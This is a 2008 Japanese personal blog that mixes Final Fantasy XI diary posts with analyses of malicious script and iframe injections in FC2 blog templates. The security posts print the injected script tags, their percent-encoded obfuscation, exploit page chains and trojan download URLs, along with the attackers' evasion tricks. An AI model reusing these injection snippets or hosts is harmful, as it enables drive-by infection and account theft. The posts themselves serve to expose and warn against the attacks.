ハルコタン紀行

fccja.comその5

fccja.comのスクリプトが更新されていました。

e.js
→a.js


*.web.fc2.com/stat.js
→b.js


a.js
→a1.asp?r=http%3A//www.fccja.com/e.js&l=www.fccja.com (スクリプトその1)
→a2.asp?r=http%3A//www.fccja.com/e.js&l=www.fccja.com (スクリプトその2)
→a3.asp?r=http%3A//www.fccja.com/e.js&l=www.fccja.com (スクリプトその3)

b.js
→b1.asp?r=http%3A//*.web.fc2.com/stat.js&l=*.web.fc2.com (スクリプトその1)
→b2.asp?r=http%3A//*.web.fc2.com/stat.js&l=*.web.fc2.com (スクリプトその2)
→b3.asp?r=http%3A//*.web.fc2.com/stat.js&l=*.web.fc2.com (スクリプトその3)

rかlに何かを入れればいいようです。
a1.asp?r=fuck (スクリプトその1)
a2.asp?l=fuck (スクリプトその2)
a3.asp?r=fuck&l=fuck (スクリプトその3)

他は昨日と同じです。

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/03/31(月) 20:51:12|
  2. ウイルス
  3. | トラックバック:0
  4. | コメント:0

fccja.comその4

いくつかのFC2ブログのテンプレートに新たなscriptが仕込まれています。
<script src="http://*.web.fc2.com/stat.js"></script>
個人のホームページのため「*」は伏せ字です。

今までは

*.blog*.fc2.com(注入)→fccja.com

となっていたのが

*.blog*.fc2.com(注入)→*.web.fc2.com(注入)→fccja.com

となっており、FC2ホームページを中継することでブログ管理者などが見逃しやすくなっています。
fc2.comのscriptとしてはFCカウンターやFC2アクセス解析などもありますので、慎重に確認したほうがよさそうです。

ついでに今後のためにエンコードしておきますね。
web.fc2.com
%77%65%62%2E%66%63%32%2E%63%6F%6D

fccja.comも更新されています。

e.js
→a.js

a.js
→a1.asp?r=http%3A//www.fccja.com/e.js (スクリプトその1)
→a2.asp?r=http%3A//www.fccja.com/e.js (スクリプトその2)
→a3.asp?r=http%3A//www.fccja.com/e.js (スクリプトその3)

*.web.fc2.com/stat.js
→b.js
2008033006.png
b.js
→b1.asp?r=http%3A//*.web.fc2.com/stat.js (スクリプトその1)
→b2.asp?r=http%3A//*.web.fc2.com/stat.js (スクリプトその2)
→b3.asp?r=http%3A//*.web.fc2.com/stat.js (スクリプトその3)

document.referrerではなくHTTP_REFERERをこっそり見たほうがいいと思いますが、
実はリファラなど見ておらず、rに何かを入れればいいようです。
a1.asp?r=fuck (スクリプトその1)

トロイ本体も更新されています。 続きを読む

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/03/30(日) 16:13:22|
  2. ウイルス
  3. | トラックバック:0
  4. | コメント:1

「伝える言葉」

フェロークエスト「伝える言葉」、フェ・インBFで連敗しています。

私 赤50/黒
フェロー 攻撃47(両手刀)

連敗。ケアルIVを連打しMPが枯渇、コンバートしても足りません。
薬品も食事もありませんでしたが、本気を出す必要を感じ作戦を検討。
とりあえずフェローのレベルが上がりそうなので48に、
戦闘スタイルを攻撃から鉄壁に、装備を両手刀から片手刀+盾に。
気合を入れて(ギルを使って)再戦してきました。

薬品
 スーパーエーテル
 プロエーテル
 バイルエリクサー+1
食事
 ロランベリーパイ
 ヤグードドリンク
 ヤグードドリンク
 ヤグードドリンク
 ヤグードドリンク

ボスディンを移動中。


私 赤50/白
フェロー 鉄壁48(片手刀+盾)

イレースや女神の祝福やリジェネIIのある白にすべきか迷いましたが、
フェローへのリフレシュを優先し赤にしました(私はドリンクで回復)。
サポートジョブを白にしたのは女神の印のためです。

結果、薬品をかなり残して勝利。

BF後、海神楼でのイベント。


私とフェローの見た目が同じなので、この後の告白(?)イベントには笑っちゃいました。

フェローへのリジェネやリフレシュはメインターゲットのみでサブターゲットは使えません。
つまり戦闘開始しているとできません(バグじゃね?)。白黒赤は回復に徹したほうがよさそうです。
なおBFでは自分が座ってもフェローは戦い続けますので、白黒でも遠慮なく座ることができます。

テーマ:FINALFANTASY XI - ジャンル:オンラインゲーム

  1. 2008/03/28(金) 20:36:00|
  2. ゲーム
  3. | トラックバック:0
  4. | コメント:0

2117966.netその1

FC2ブログとはあまり関係ありませんが、とりあえず。
JPCERT/CC2008年3月14日注意喚起

世界中のサイトで大規模に以下のscriptが仕込まれています
("2117966.net"で検索してみましょう)。
<script src="http://www.2117966.net/fuckjp.js"></script>
トレンドマイクロに仕掛けられていたのもこれです。
このスクリプトはいくつかのiframeが入れ替わります
(自動で、あるいは犯人の気まぐれで)。

iframeその1
http://www.2117966.net/fuckjp.js
→http://www.2117966.net/q.htm

iframeその2
http://www.2117966.net/fuckjp.js
→http://www.2117966.net/cuteqq.htm

iframeその3
http://www.2117966.net/fuckjp.js
→http://count.lljy.org/b/

また、iframeその3にはさらにiframeがあります。
iframeその4
http://count.lljy.org/b/
→http://biej8fanwo.a141.71one.com/wow/guowai.htm

iframeその1
http://www.2117966.net/q.htm
→http://www.2117966.net/Ajax.gif
→http://www.2117966.net/Ms06014.htm
→http://www.2117966.net/Ms06067.gif
→http://www.2117966.net/Ms07004.htm
→http://www.2117966.net/Pps.gif
→http://www.2117966.net/Real.gif

iframeその2
http://www.2117966.net/cuteqq.htm
→http://www.2117966.net/Ajax.gif
→http://www.2117966.net/Bfyy.gif
→http://www.2117966.net/Lz.gif
→http://www.2117966.net/Ms06014.htm
→http://www.2117966.net/QVod.htm
→http://www.2117966.net/Real.gif
→http://www.2117966.net/XunLei.gif

iframeその3
http://count.lljy.org/b/
→http://count.lljy.org/b/Ajax.gif
→http://count.lljy.org/b/Ms06014.htm
→http://count.lljy.org/b/Ms06067.js
→http://count.lljy.org/b/Ms07004.html
→http://count.lljy.org/b/Real.js
→http://count.lljy.org/b/Yahoo.Php

iframeその4
http://biej8fanwo.a141.71one.com/wow/guowai.htm
→http://biej8fanwo.a141.71one.com/wow/Ajax.gif
→http://biej8fanwo.a141.71one.com/wow/Ms06014.htm
→http://biej8fanwo.a141.71one.com/wow/Ms06067.gif
→http://biej8fanwo.a141.71one.com/wow/Ms07004.htm
→http://biej8fanwo.a141.71one.com/wow/Real.gif
→http://biej8fanwo.a141.71one.com/wow/Yahoo.php

最終的にアンチウイルスが検出・駆除すべきウイルスは以下の4匹です。
http://www.2117966.net/1.exe
http://www.2117966.net/xp.exe
http://count.lljy.org/b/a.exe
http://biej8fanwo.a141.71one.com/wow/wow.exe

わかりやすいファイル名になっていますが、念のためそれぞれを見てみましょう。
ms06014 MS06-014、MDACです。
ms06067 MS06-057の間違いです。MS06-057、WebViewFolderIcon(WEBVW.DLL)です。
ms07004 MS07-004、VML(VGX.DLL)です。
ajax MS06-014、MDACです。
bfyy 暴風(BaoFeng)です(中国)。
lz HanGameCn(韓国ハンゲームの中国向けコントロール)です(中国)。
pps PPStreamです(中国)。
qvod QvodPlayerです(中国)。
real RealPlayerです。
xunlei 迅雷(Xunlei)です(中国)。
yahoo Yahoo!MessengerというかYahoo!MusicJukeboxです。

以上10個の脆弱性は全てActiveXコントロールを使うためIEでしか動作しません。
10個のActiveXコントロールのうちMicrosoft製は3個です(これらの脆弱性は全てWindowsUpdateで阻止できます)。
残り7個のサードパーティ製のうち世界で通用するのはわずかに2個(RealとYahoo!)で、
残り5個は中国内でしか使われていません(これらの脆弱性の阻止については各アプリケーションの製造元に(略))。
ターゲットは中国内外を問わず無差別であることがわかります。

冒頭で書いたとおり世界中のサイトで大規模に仕込まれています。
日本をターゲットとするのならジャストシステムなどのアプリケーションを狙うでしょうし、
海外のいかなる記事も特に日本をターゲットとするような記述はありません。

何が言いたいのかというとですね。

「fuckjp」というファイル名を根拠に「日本をターゲット」と書いたんですか?
LAC2008年3月12日注意喚起

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/03/27(木) 22:28:21|
  2. ウイルス
  3. | トラックバック:0
  4. | コメント:0

fccja.comその3

fccja.comのトロイが更新されていました。
http://www.fccja.com/com.exe
VirusTotal

Packerを使っているため検出結果が今までの傾向とは異なります。
PEiDではPackerを識別できませんでした。

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/03/26(水) 21:13:39|
  2. ウイルス
  3. | トラックバック:0
  4. | コメント:2

fccja.comその2

fccja.com/e.jsが更新されていました。

昨日
e.js
→d1.asp (スクリプトその1)
→d2.asp (スクリプトその2)
→d3.asp (スクリプトその3)

今日
e.js
→a1.asp (スクリプトその1)
→a2.asp (スクリプトその2)
→a3.asp (スクリプトその3)

動作は昨日と同じです。明日b1.aspとか明後日c1.aspとかやらないでくださいね。

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/03/24(月) 16:29:26|
  2. ウイルス
  3. | トラックバック:0
  4. | コメント:2

fccja.comその1

いくつかのFC2ブログのテンプレートに新たなscriptが仕込まれています。
<script language="javascript" src="http://%77%77%77%2E%66%63%63%6A%61%2E%63%6F%6D/%65%2E%6A%73"></script>
デコードします。
<script language="javascript" src="http://www.fccja.com/e.js"></script>
language="javascript"ではなくtype="text/javascript"を使うべきです。

IPがhellh.netの隣なので結果はわかってはいますが、とりあえずwhoisします。
Creation Date:2008-03-20
Country:China

http://www.fccja.com/
に(iframeなどで)アクセスした場合でもDefault.htmは
<script language="javascript" src="http://www.fccja.com/e.js"></script>
となっており、e.jsが起点となっています。

e.jsはd1.asp、d2.asp、d3.aspを順にtry~catchします。
d1.asp、d2.asp、d3.aspが狙う脆弱性は順にMS06-014(MDAC)、RealPlayer、MS07-017(アニメーションカーソル)です。

Default.htm
→e.js
 →d1.asp (スクリプトその1)
 →d2.asp (スクリプトその2)
 →d3.asp (スクリプトその3)
スクリプトを全てASPにしており、2回目のアクセスでは何も返って来ません(Content-Length: 0)。
どうでもいいことですが、<div style="display:none">とスタイルシートで非表示にしています。

MS07-017はトロイを実行させる手法としては比較的ポピュラーですが、今までのdda3.netやhellh.netでは使われていませんでした。
細工されたファイル(ani等)をWindowsが触る(GDIが描画する)だけで発動するため、ブラウザは関係ありません。
WindowsUpdateしていれば阻止できます。

http://www.fccja.com/com.exe
VirusTotal


ついでに4日経過したhellh.netを再スキャン。
http://www.hellh.net/vip.exe
VirusTotal


遅くとも2日以内には対応してほしいものです。
対応した頃にはとっくに新種に置き換わっていた、では役に立ちません。

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/03/23(日) 16:19:14|
  2. ウイルス
  3. | トラックバック:0
  4. | コメント:0

hellh.netその4

いくつかのFC2ブログのテンプレートにiframeが仕込まれていましたが、scriptも使うようになりました。
<script src="http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%77%2E%6A%73"></script>
デコードします。
<script src="http://www.hellh.net/w.js"></script>

http://www.hellh.net/w.js
を見てみましょう。
document.write("<iframe src=http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74 width=0 height=0></iframe>");
デコードします。
document.write("<iframe src=http://www.hellh.net width=0 height=0></iframe>");
というわけで、動作は今までのiframeと同じです。

ついでにhellh.netが更新されているので見てみましょう。
Default.htmが以下をiframeで呼び出します。
http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%68%65%61%64%2E%61%73%70
デコードします。
http://www.hellh.net/head.asp
おっと、ASPです(CGIみたいなもの)。
処理は推測するしかありませんが、おそらく以下のようになっています。

初回アクセスのHTTPヘッダ
Location: error.htm
次回アクセスのHTTPヘッダ
Location: http://search.fc2.com

解析を避けるためか、2回目以降はFC2に飛ばしてしまいます。
ということで以前のDefault.htmに相当するページは
http://www.hellh.net/error.htm
となります。

IISのエラーページを装ったerror.htmは以下の2つをiframeで呼び出します。
http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%64%76%2E%68%74%6D
http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%76%69%70%2E%68%74%6D
デコードします。
http://www.hellh.net/dv.htm
http://www.hellh.net/vip.htm
以前とのページ構成の違いは以下のようになっています。 続きを読む

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/03/20(木) 23:36:50|
  2. ウイルス
  3. | トラックバック:0
  4. | コメント:0

移動魔法

バージョンアップで移動魔法が追加されていました。
リコールジャグ白53
リコールパシュ白53
リコールメリファ白53
リトレース黒55
…。

ま、テレポヴァズも持っていないんですけどね。
3箇所のゲートクリスタルを手に入れ、ついでに獣人拠点まで散歩しました。

テーマ:FINALFANTASY XI - ジャンル:オンラインゲーム

  1. 2008/03/16(日) 22:27:29|
  2. ゲーム
  3. | トラックバック:0
  4. | コメント:0

ミッション

ミッションを確認してみます。

自国
4コンプリート
5は当分無理なので4で止めてそのまま忘れていました。
というか「ジュノへの急報」をもらってそのまま…。
アウトポストテレポしに大工房に入ると変な音楽が流れるわけだ。
5-1をオファーするか、他国に移籍して2-2までコンプリートするか迷っています。

ジラート
1新たなる世界オファー
オファーしたというか、インストールしただけというか…。

プロマシア
1-1命の洗礼コンプリート
1-2楼閣の下にオファー
プロミヴォン。タクティクスパールをもらうために毎週通っています。

アトルガン
11双蛇の謀 コンプリート
12無手の傀儡師 オファー
見た目では最も進んでいるのがアトルガンだったりします。
「ジョディの消化液」が必要で、これがRareExなので終了(Ameretat Lv65~)。

アルタナ
2はじまりの刻コンプリート
3ケット・シー、馳せるオファー
アルタナは過去世界の特定のクエストのコンプリートで進みます。
サンドリアオーク軍団掃討作戦オファー
バストゥーク静かなる警告コンプリート
ウィンダス禍つ闇、襲来オファー
サンドリアとウィンダスはNM戦があるので終了。
バストゥークはこの前の「沈黙の契約」で必要な「ノールの爪」は競売所で。
この後の「解明への灯火」はBF戦らしいのでたぶん終了。

低レベル1人で「ケット・シー、馳せる」をオファーできるのはバストゥークだけ!

テーマ:FINALFANTASY XI - ジャンル:オンラインゲーム

  1. 2008/03/15(土) 12:40:43|
  2. ゲーム
  3. | トラックバック:0
  4. | コメント:0

FFXIバージョンアップ

2007年 3月11日 FFXIバージョンアップ。
いまさらですがエントリが1つだと寂しいのでとりあえず。
いやバージョンアップは当日しましたよ?
そのままPOLからログアウトしただけで。
土日にタクティクスパールを4回使い
プロミヴォンで新しいタクティスクパールをもらう。
これしかやっていないので。

「エッグハント」が始まっているようですが、私のポストには
「ひなまつり」の何かが入ったままです。たぶん。

テーマ:FINALFANTASY XI - ジャンル:オンラインゲーム

  1. 2008/03/14(金) 21:48:21|
  2. ゲーム
  3. | トラックバック:0
  4. | コメント:0

dda3.netとhellh.netその3

以上でdda3.netとhellh.netでそれぞれ実行されるファイルがわかりましたのでもらっておきます。
このファイルが有害かどうかをVirusTotalなどのオンラインスキャナで調べてみましょう。

http://www.dda3.net/sys.exe

http://www.hellh.net/win.exe


オンラインスキャナには以下のようなものがあります。
VirusTotal http://www.virustotal.com/
現時点で最も有名。ウイルスバスターがありません。
Virus.Org http://scanner.virus.org/
ウイルスバスターはありますがNortonがありません。
Jotti http://virusscan.jotti.org/
数は少ないですが、最古参だと思います。個人でやっていらっしゃるのかサーバが過負荷になりやすいです。NortonもMcAfeeもウイルスバスターもありません。
VirScan http://virscan.org/
最多だと思います。ただサーバが中国なので遅いのと、それでエラーが多発し結果が怪しくなります。

いずれも結果は基本的に1行しか出ないので、複数のファイルを圧縮してのスキャンはどれが有害でどれが無害かわからなくなります。1ファイルずつにしましょう。
設定やシグネチャの配布状況などによって実際の製品とは結果が異なることがあります。
誤検知が多い製品もあります。2~3個しか有害判定が出ない場合は見定める必要があります。

メモ:
VirusTotalなどにあるVirusBusterはハンガリーの製品です。トレンドマイクロの製品はPC-cillinまたはウイルスバスターです。混同を避けるためこのブログではウイルスバスターのみカナ表記にしています。
ソースネクストのウイルスセキュリティ(インドのK7)はどこにもありませんが、上記スキャナに含まれるどのアンチウイルスよりも検出できないので無くても問題はありません!

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/03/14(金) 08:29:17|
  2. ウイルス
  3. | トラックバック:0
  4. | コメント:0

hellh.netその2

hellh.netのindex.htmとre.htmをいじってみます。
とりあえずindex.htmを見てみましょう。

Encode? これはMicrosoftのWindows Script Encoderによるものです。
鍵が必要な暗号とかではなく「スクリプトが下手で汚いからちょっと見られたくないな」程度の物なので
昔からデコーダが存在します。Windows Script Decoderなどでなどで検索してコピペするのが楽でしょう。
どうせIEでしか動かないのでVBScriptを使うのが一般的ですが、これはJScriptです。

dda3.net同様にMS06-014です。

同様にre.htmも。

aaaaaなどとごみが入っていますがdda3.netと同様にRealPlayerです。

そして後日、スクリプトが更新されていた! 続きを読む

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/03/14(金) 03:45:20|
  2. ウイルス
  3. | トラックバック:1
  4. | コメント:0

dda3.netその2

dda3.netのindex.htmとhe.htmをいじってみます。
とりあえずindex.htmを見てみましょう。

げ。でもこれは前回出てきた16進数です。デコードします。

げげ。これは10進数です。デコードします。

見えてきました。
普段はこの辺でやめます(exeのファイル名が見えている)が、今回は掃除してみましょう。
まず10進数は数字が繋がってしまう(%12%34はあきらかに%12と%34だが、1234は1と234なのか12と34なのか123と4なのかがわからなくなる)ので
カンマなどで区切ってスクリプトで処理しています。よってカンマを消します。
本来必要なカンマも消えますが、何をやっているのかがわかればいいのです。
%0D%0Aと13,10は改行なので改行して消します。

できあがり。
これはMS06-014、MDACの脆弱性を使うスクリプトです。WindowsUpdateで阻止できます。

同様にhe.htmもいじります。

これはRealPlayerの脆弱性を使うスクリプトです。阻止できない可能性があります。
RealPlayer11.0.1(6.0.14.794)では修正済みのようですが、日本語版は11(6.0.14.748)しかないからです。
(このスクリプトを最初に大規模にばら撒いたのはuc8010.comだと思います)。

メモ:
スクリプトのエンコードは\~(8進数)や\x~(16進数、%~と同じ)も使われる。標準(ECMA-262?)でどうなっているのかは知らない!

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/03/14(金) 01:40:09|
  2. ウイルス
  3. | トラックバック:0
  4. | コメント:0

hellh.netその1

いくつかのFC2ブログのテンプレートにまたiframe(インラインフレーム)が仕掛けられていたそうです。サイズ指定は省略します。
<iframe src="http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/"></iframe>
今回はエンコードされています。
%~というのは16進数で、ASCII(文字コード)を意味しています。
たとえば以下は同じGoogleにアクセスします。
http://www.google.co.jp/
http://%77%77%77%2e%67%6f%6f%67%6c%65%2e%63%6f%2e%6a%70/
文字コード表とにらめっこしてもツールを使ってもかまいませんが、URI Decoderなどで検索してコピペするのが楽でしょう。
<iframe src="http://www.hellh.net/"></iframe>
pingを飛ばすとdda3.netと同じホストとわかります。
もう結果はわかっていますがとりあえずwhoisします。
Creation Date:2008-03-08
Country:China

フレームの構成はdda3.netとあまりかわりません。
Default.htmがiframeで以下の2つのフレームを呼び出します。
なお、この呼び出しのiframeもエンコードされています。
http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%69%6E%64%65%78%2E%68%74%6D
http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%72%65%2E%68%74%6D
デコードします。
http://www.hellh.net/index.htm
http://www.hellh.net/re.htm

続きます。

メモ:
エンコードされると面倒だ!
%21%22%23%24%25はそれぞれ!"#$%となっていて、キーボードの数字の並びと同じ! ふしぎ!
%20はブランクです。

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/03/13(木) 23:58:36|
  2. ウイルス
  3. | トラックバック:0
  4. | コメント:0

dda3.netその1

いくつかのFC2ブログのテンプレートにiframe(インラインフレーム)が仕掛けられていたそうです。
<iframe src="http://www.dda3.net/"></iframe>
実際には大きさ0(width="0" height="0")の指定もあります(ブラウザで表示されない)が省略します。

いつものオンラインゲームの中国製アカウントハックです。
iframeで以下の2つのフレームを呼び出します。
http://www.dda3.net/index.htm
http://www.dda3.net/he.htm
indexがindexを呼んで再帰に陥っているように見えますが、ディレクトリにアクセスした場合にどのファイルを表示するか(あるいはファイル一覧を表示するか403を返すか)はWebサーバ(ApacheやIISなど)の設定次第です。
HTTPヘッダによると
Content-Location:http://www.dda3.net/Default.htm
となっていて、Default.htmがindex.htmとhe.htmを呼び出しています。
そもそもDefault.htmはMicrosoftのIIS(Windowsに付属)のデフォルトとなっています。
HTTPヘッダによると
Server:Microsoft-IIS/6.0
とWindowsServer2003をお使いのようです。

ちなみにwhoisすると
Creation Date:2008-02-26
Country:China
となっており、このアカウントハックのためだけに登録したドメインのようです。
ドメインの登録は無料ではありませんが、RMTのためのささやかな投資です。
根本的な原因はRMTです。

続きます。

メモ:
HTTPヘッダ ブラウザもHTTPヘッダで通信しているぞ! Googleで調べてみよう!
whois ドメインの情報を調べることができるぞ! Googleで(略)

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/03/13(木) 23:00:34|
  2. ウイルス
  3. | トラックバック:0
  4. | コメント:0

FFXI

2007年 7月29日 FFXIプレイ開始。白黒赤を同時にレベル上げ。
2007年 8月17日 サポートジョブ取得。
2007年 8月29日 白19黒19赤19、プレイ開始から1ヶ月でジュノに到着、後日チョコボ免許取得。
2007年12月23日 白50黒50赤50、ランク2。
2008年 1月17日 ミッション2-3のドラゴンBFに参加、続けて3-1から3-3を終えてランク4。
2008年 1月18日 ミッション4を終えてランク5、飛空艇パス取得。
2008年 1月19日 フェロー取得。
今はレベル上げ中です。フェローの。

テーマ:FINALFANTASY XI - ジャンル:オンラインゲーム

  1. 2008/03/13(木) 22:08:25|
  2. ゲーム
  3. | トラックバック:0
  4. | コメント:0

Start

ブログは読むだけだったけど仕組みがよくわからないので作ってみました。
  1. 2008/03/13(木) 21:44:51|
  2. 未分類
  3. | トラックバック:0
  4. | コメント:0